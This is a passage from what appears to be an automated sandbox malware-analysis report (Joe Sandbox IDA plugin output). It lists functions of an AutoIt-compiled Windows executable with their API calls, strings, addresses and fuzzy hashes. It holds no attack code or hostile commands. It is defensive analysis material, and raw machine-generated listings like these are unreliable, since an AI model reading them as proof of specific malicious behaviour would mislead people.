                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 9721498-966354055
                                                        • Opcode ID: 347ad35ca719831f3049c37950e5cdb6c1c1c6b48726a1899b4c973bc6bbdc75
                                                        • Instruction ID: 205fdd838bbb14a2c9b015546a240b3354d234c89f0463a1b4aea0c083de5962
                                                        • Opcode Fuzzy Hash: 347ad35ca719831f3049c37950e5cdb6c1c1c6b48726a1899b4c973bc6bbdc75
                                                        • Instruction Fuzzy Hash: 68127935604201AFD714DF24C881A6AB7E5EF88714F15C85DF98AAB3A2DB31FC45CBA1
                                                        Function 00E8091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00E809C6
                                                        • _wcslen.LIBCMT ref: 00E80A01
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E80A54
                                                        • _wcslen.LIBCMT ref: 00E80A8A
                                                        • _wcslen.LIBCMT ref: 00E80B06
                                                        • _wcslen.LIBCMT ref: 00E80B81
                                                          • Part of subcall function 00E0F9F2: _wcslen.LIBCMT ref: 00E0F9FD
                                                          • Part of subcall function 00E52BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E52BFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 1103490817-4258414348
                                                        • Opcode ID: 6b5cad9ece962568c1642abc6219b74f5bec1840aee98aff27ce5dbe992b6665
                                                        • Instruction ID: 2428cf44f85ece9885489a03346a55003621b6b94e7f841c7691b54ecd5f4b45
                                                        • Opcode Fuzzy Hash: 6b5cad9ece962568c1642abc6219b74f5bec1840aee98aff27ce5dbe992b6665
                                                        • Instruction Fuzzy Hash: 89E187312083019FC754EF24C45196AB7E2BFD8318B11A95CF89EAB7A2D730ED49CB91
                                                        Function 00E7C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 1256254125-909552448
                                                        • Opcode ID: 9d6d0aadf977a8e00ff567fd2e8f801e9c94f209ee77a0ed7588b63ba767c084
                                                        • Instruction ID: 46768b54e435d3231f1b394f7e4d2da6609056fcb69805faf70849e2e7d001f9
                                                        • Opcode Fuzzy Hash: 9d6d0aadf977a8e00ff567fd2e8f801e9c94f209ee77a0ed7588b63ba767c084
                                                        • Instruction Fuzzy Hash: F471D87260012A8BCB20DE7CCD525FB33999BA4759B35A52DF85EB7284E631CD85C3A0
                                                        Function 00E8833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00E8835A
                                                        • _wcslen.LIBCMT ref: 00E8836E
                                                        • _wcslen.LIBCMT ref: 00E88391
                                                        • _wcslen.LIBCMT ref: 00E883B4
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E883F2
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E85BF2), ref: 00E8844E
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E88487
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E884CA
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E88501
                                                        • FreeLibrary.KERNEL32(?), ref: 00E8850D
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E8851D
                                                        • DestroyIcon.USER32(?,?,?,?,?,00E85BF2), ref: 00E8852C
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E88549
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E88555
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                        • String ID: .dll$.exe$.icl
                                                        • API String ID: 799131459-1154884017
                                                        • Opcode ID: 239c0238a7813caf4432a756d60a8d32f0e0e03e9bde2a7bc5f41205890ede08
                                                        • Instruction ID: e83ac52197f82767a23505035486c27a789625714696a9f3e568dda6cb28f28b
                                                        • Opcode Fuzzy Hash: 239c0238a7813caf4432a756d60a8d32f0e0e03e9bde2a7bc5f41205890ede08
                                                        • Instruction Fuzzy Hash: 2D61CE72540219BEEB14AF64CD41BFE77A8AF04721F505509F829F61D1DB74A984C7A0
                                                        Function 00DF7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 0-1645009161
                                                        • Opcode ID: 581b2a624d2cc27488e654af2e8682350c9df05ee4315999d6916771302fc319
                                                        • Instruction ID: d75ce29e296f9061d3a71791de2958df500593a1fb1793d1bb8b63e17fed7bc4
                                                        • Opcode Fuzzy Hash: 581b2a624d2cc27488e654af2e8682350c9df05ee4315999d6916771302fc319
                                                        • Instruction Fuzzy Hash: C281B471A04609AADB20BF60CD46FFE7BA4EF55340F059024FA09BA296EB70D951C7B1
                                                        Function 00E55A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadIconW.USER32(00000063), ref: 00E55A2E
                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E55A40
                                                        • SetWindowTextW.USER32(?,?), ref: 00E55A57
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00E55A6C
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00E55A72
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00E55A82
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00E55A88
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E55AA9
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E55AC3
                                                        • GetWindowRect.USER32(?,?), ref: 00E55ACC
                                                        • _wcslen.LIBCMT ref: 00E55B33
                                                        • SetWindowTextW.USER32(?,?), ref: 00E55B6F
                                                        • GetDesktopWindow.USER32 ref: 00E55B75
                                                        • GetWindowRect.USER32(00000000), ref: 00E55B7C
                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00E55BD3
                                                        • GetClientRect.USER32(?,?), ref: 00E55BE0
                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00E55C05
                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E55C2F
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                        • String ID:
                                                        • API String ID: 895679908-0
                                                        • Opcode ID: f5b13cafa3b4ae7edf24d141f7382a751928ba85aa0ce8754aeb709bfa314bfb
                                                        • Instruction ID: 74bdaf103245e2a04174fa6cfe609c1adf1d2c05eeee53f007c7d364558d1eb5
                                                        • Opcode Fuzzy Hash: f5b13cafa3b4ae7edf24d141f7382a751928ba85aa0ce8754aeb709bfa314bfb
                                                        • Instruction Fuzzy Hash: 2F719032900B059FCB20DFA9CE59AAEBBF5FF48705F101928E546B25A0D775E908CF50
                                                        Function 00E530F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[
                                                        • API String ID: 176396367-1901692981
                                                        • Opcode ID: dd4eadf176074893d91857d2ef124af08832f5d3c0c5f2bb233113684c895cdb
                                                        • Instruction ID: a743133151c3b624d373207d5b6bad93bfa624530d8cd81b5241856521a3f554
                                                        • Opcode Fuzzy Hash: dd4eadf176074893d91857d2ef124af08832f5d3c0c5f2bb233113684c895cdb
                                                        • Instruction Fuzzy Hash: 46E1F832A005169BCB149F78C4517EEFBB0FF44795F64A919E866B7240DB309E8DC7A0
                                                        Function 00E100C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00E100C6
                                                          • Part of subcall function 00E100ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00EC070C,00000FA0,D1568641,?,?,?,?,00E323B3,000000FF), ref: 00E1011C
                                                          • Part of subcall function 00E100ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00E323B3,000000FF), ref: 00E10127
                                                          • Part of subcall function 00E100ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00E323B3,000000FF), ref: 00E10138
                                                          • Part of subcall function 00E100ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00E1014E
                                                          • Part of subcall function 00E100ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E1015C
                                                          • Part of subcall function 00E100ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E1016A
                                                          • Part of subcall function 00E100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E10195
                                                          • Part of subcall function 00E100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E101A0
                                                        • ___scrt_fastfail.LIBCMT ref: 00E100E7
                                                          • Part of subcall function 00E100A3: __onexit.LIBCMT ref: 00E100A9
                                                        Strings
                                                        • kernel32.dll, xrefs: 00E10133
                                                        • InitializeConditionVariable, xrefs: 00E10148
                                                        • WakeAllConditionVariable, xrefs: 00E10162
                                                        • SleepConditionVariableCS, xrefs: 00E10154
                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E10122
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                        • API String ID: 66158676-1714406822
                                                        • Opcode ID: d3bb257504bba3217fc96fe882e8e6ad8dae24341a69c0e05a6d01ebfe8ae0a5
                                                        • Instruction ID: a7f187c5e26943f9dfa12a4707d505857d9c57980d925daf8641201621467a21
                                                        • Opcode Fuzzy Hash: d3bb257504bba3217fc96fe882e8e6ad8dae24341a69c0e05a6d01ebfe8ae0a5
                                                        • Instruction Fuzzy Hash: 1C210732646710AFD7106B65AC49BAA33E4EB05F61F10213AF909F26D1DBF498848BA0
                                                        Function 00E644C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(00000000,00000000,00E8CC08), ref: 00E64527
                                                        • _wcslen.LIBCMT ref: 00E6453B
                                                        • _wcslen.LIBCMT ref: 00E64599
                                                        • _wcslen.LIBCMT ref: 00E645F4
                                                        • _wcslen.LIBCMT ref: 00E6463F
                                                        • _wcslen.LIBCMT ref: 00E646A7
                                                          • Part of subcall function 00E0F9F2: _wcslen.LIBCMT ref: 00E0F9FD
                                                        • GetDriveTypeW.KERNEL32(?,00EB6BF0,00000061), ref: 00E64743
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2055661098-1000479233
                                                        • Opcode ID: 22814aaf400f7861263e3e2cafd55b522cf17de743c285ca10c7bde0596c051f
                                                        • Instruction ID: 0e712d5d5deece931720df1fe86640abdd4f34b77636e30dc8e5d1d8cbf462cd
                                                        • Opcode Fuzzy Hash: 22814aaf400f7861263e3e2cafd55b522cf17de743c285ca10c7bde0596c051f
                                                        • Instruction Fuzzy Hash: 25B101B16483029FC710DF28E890AAEB7E5EFA57A4F10A91DF196E72D1D730D844C662
                                                        Function 00E8911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E09BB2
                                                        • DragQueryPoint.SHELL32(?,?), ref: 00E89147
                                                          • Part of subcall function 00E87674: ClientToScreen.USER32(?,?), ref: 00E8769A
                                                          • Part of subcall function 00E87674: GetWindowRect.USER32(?,?), ref: 00E87710
                                                          • Part of subcall function 00E87674: PtInRect.USER32(?,?,00E88B89), ref: 00E87720
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00E891B0
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E891BB
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E891DE
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E89225
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00E8923E
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00E89255
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00E89277
                                                        • DragFinish.SHELL32(?), ref: 00E8927E
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E89371
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#
                                                        • API String ID: 221274066-136824727
                                                        • Opcode ID: d2e2b83d86c25e8a1fd55c12159cf0692cc6ae7b786dafffdd042c88d91869c2
                                                        • Instruction ID: bfab163710b2b35bcf3736722d695e694d8ba77aff2cd4ba42bc608811ca68a6
                                                        • Opcode Fuzzy Hash: d2e2b83d86c25e8a1fd55c12159cf0692cc6ae7b786dafffdd042c88d91869c2
                                                        • Instruction Fuzzy Hash: 9C61BD71508304AFC701EF55DC85DAFBBE8EFC9750F00492DF699A21A1DB309A49CB62
                                                        Function 00E7AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00E7B198
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E7B1B0
                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E7B1D4
                                                        • _wcslen.LIBCMT ref: 00E7B200
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E7B214
                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E7B236
                                                        • _wcslen.LIBCMT ref: 00E7B332
                                                          • Part of subcall function 00E605A7: GetStdHandle.KERNEL32(000000F6), ref: 00E605C6
                                                        • _wcslen.LIBCMT ref: 00E7B34B
                                                        • _wcslen.LIBCMT ref: 00E7B366
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E7B3B6
                                                        • GetLastError.KERNEL32(00000000), ref: 00E7B407
                                                        • CloseHandle.KERNEL32(?), ref: 00E7B439
                                                        • CloseHandle.KERNEL32(00000000), ref: 00E7B44A
                                                        • CloseHandle.KERNEL32(00000000), ref: 00E7B45C
                                                        • CloseHandle.KERNEL32(00000000), ref: 00E7B46E
                                                        • CloseHandle.KERNEL32(?), ref: 00E7B4E3
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 2178637699-0
                                                        • Opcode ID: 9b54454a970cfbd46fe70953d75dddf7a96c26fd932a74ff8965d5b74f94ebb2
                                                        • Instruction ID: 792d24e365a74c56409b1a7d123ef0caa0c9a09c8f75af49b1616ad77e6e6f78
                                                        • Opcode Fuzzy Hash: 9b54454a970cfbd46fe70953d75dddf7a96c26fd932a74ff8965d5b74f94ebb2
                                                        • Instruction Fuzzy Hash: 55F1AB316083409FC724EF24C891B6EBBE1EF85314F14955DF999AB2A2DB30EC45CB62
                                                        Function 00DF326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenuItemCount.USER32(00EC1990), ref: 00E32F8D
                                                        • GetMenuItemCount.USER32(00EC1990), ref: 00E3303D
                                                        • GetCursorPos.USER32(?), ref: 00E33081
                                                        • SetForegroundWindow.USER32(00000000), ref: 00E3308A
                                                        • TrackPopupMenuEx.USER32(00EC1990,00000000,?,00000000,00000000,00000000), ref: 00E3309D
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E330A9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                        • String ID: 0
                                                        • API String ID: 36266755-4108050209
                                                        • Opcode ID: 3af78f26391935433776dab2d4160c784630f13c627fe3c379c32eb5907bb140
                                                        • Instruction ID: a8f88306e89655669d619ae7476fa755616f1202b343a79f406dc1405f0ee333
                                                        • Opcode Fuzzy Hash: 3af78f26391935433776dab2d4160c784630f13c627fe3c379c32eb5907bb140
                                                        • Instruction Fuzzy Hash: 2171F830640209BEEB259F29CC4DFAABF64FF05768F204216F6187A1E1C7B1A914DB64
                                                        Function 00E86CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(00000000,?), ref: 00E86DEB
                                                          • Part of subcall function 00DF6B57: _wcslen.LIBCMT ref: 00DF6B6A
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E86E5F
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E86E81
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E86E94
                                                        • DestroyWindow.USER32(?), ref: 00E86EB5
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DF0000,00000000), ref: 00E86EE4
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E86EFD
                                                        • GetDesktopWindow.USER32 ref: 00E86F16
                                                        • GetWindowRect.USER32(00000000), ref: 00E86F1D
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E86F35
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E86F4D
                                                          • Part of subcall function 00E09944: GetWindowLongW.USER32(?,000000EB), ref: 00E09952
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
